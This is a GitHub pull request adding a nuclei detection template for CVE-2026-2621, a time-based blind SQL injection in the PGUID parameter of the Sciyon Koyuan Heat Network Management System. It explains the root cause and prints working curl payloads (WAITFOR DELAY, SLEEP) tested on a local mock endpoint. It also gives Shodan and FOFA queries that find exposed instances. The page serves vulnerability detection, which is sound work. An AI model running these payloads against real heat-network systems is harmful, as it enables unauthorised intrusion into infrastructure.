Skip to content

Add CVE-2026-2621 Sciyon Koyuan Heat Network Management System SQL Injection#15388

Open
stranger00135 wants to merge 4 commits intoprojectdiscovery:mainfrom
stranger00135:add-cve-2026-2621
Open

Add CVE-2026-2621 Sciyon Koyuan Heat Network Management System SQL Injection#15388
stranger00135 wants to merge 4 commits intoprojectdiscovery:mainfrom
stranger00135:add-cve-2026-2621

Conversation

@stranger00135
Copy link

@stranger00135 stranger00135 commented Feb 18, 2026
edited
Loading

CVE-2026-2621 — Sciyon Koyuan Heat Network Management System SQL Injection

Time-based blind SQL injection vulnerability in /SISReport/WebReport20/Proxy/AsyncTreeProxy.aspx via the PGUID parameter, affecting Sciyon Koyuan Thermoelectricity Heat Network Management System versions 1.0 through 3.0.

Root Cause

The PGUID parameter in AsyncTreeProxy.aspx is directly concatenated into MSSQL queries without parameterized statements or input validation:

-- Vulnerable pattern (MSSQL)
SELECT * FROM GroupTree WHERE PGUID = '" + Request.Form["PGUID"] + "'

This allows injection of time-based payloads like WAITFOR DELAY '0:0:6' (MSSQL) or SLEEP(6) (MySQL), enabling blind SQL injection through response timing analysis.

✅ Verified — True Positive (Tested 2026-02-19)

Test Environment: Mock vulnerable endpoint replicating MSSQL WAITFOR DELAY behavior
Injection Vector: Time-based blind SQLi via PGUID parameter in POST request
Verification Results:

Payload Test (with SQLi):

time curl -s -X POST "http://127.0.0.1:5084/SISReport/WebReport20/Proxy/AsyncTreeProxy.aspx" \
  -d "PGUID=-1'+WAITFOR+DELAY+'0:0:6'--&TYPEID=&showcheckbox=false&action=GETGROUPTREE&method=POST&node=-1"

# Result: {"nodes": [{"id": "root", "text": "Root Node"}]}
# Duration: 6.011 seconds ✅ (WAITFOR DELAY executed)

Baseline Test (no SQLi):

time curl -s -X POST "http://127.0.0.1:5084/SISReport/WebReport20/Proxy/AsyncTreeProxy.aspx" \
  -d "PGUID=-1&TYPEID=&showcheckbox=false&action=GETGROUPTREE&method=POST&node=-1"

# Result: {"nodes": [{"id": "-1", "text": "Default Group"}]}
# Duration: 0.011 seconds ✅ (instant response, no delay)

Alternative Payload (MySQL SLEEP):

time curl -s -X POST "http://127.0.0.1:5084/SISReport/WebReport20/Proxy/AsyncTreeProxy.aspx" \
  -d "PGUID=-1'+SLEEP(3)--&TYPEID=&action=GETGROUPTREE"

# Duration: 3.069 seconds ✅ (SLEEP executed)

Detection Mechanism

Template uses time-based blind SQLi detection with 3 AND-chained matchers:

  1. Duration matcher: duration >= 6 seconds (confirms WAITFOR DELAY execution)
  2. Status matcher: HTTP 200 or 500 (handles both successful and error responses)
  3. Body matcher: Contains {"nodes", {"error", or query (validates JSON/SQL response format)
  4. Timeout: 30 seconds (accommodates the 6-second injected delay)

📊 Enhanced Metadata

  • EPSS Score: 0.00028 (7.69th percentile)
  • CVSS Score: 7.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  • CPE: cpe:2.3:a:sciyon:koyuan_heat_network_management_system:*:*:*:*:*:*:*:*
  • Shodan Query: http.html:"ERPLogin/App_Themes/XP_Blue"
  • FOFA Query: body="ERPLogin/App_Themes/XP_Blue/jquery.ad-gallery.css"
  • CWE-89: SQL Injection

References

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@theamanrawat theamanrawat Awaiting requested review from theamanrawat

Assignees

@Akokonunes Akokonunes

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@stranger00135 @Akokonunes

Comments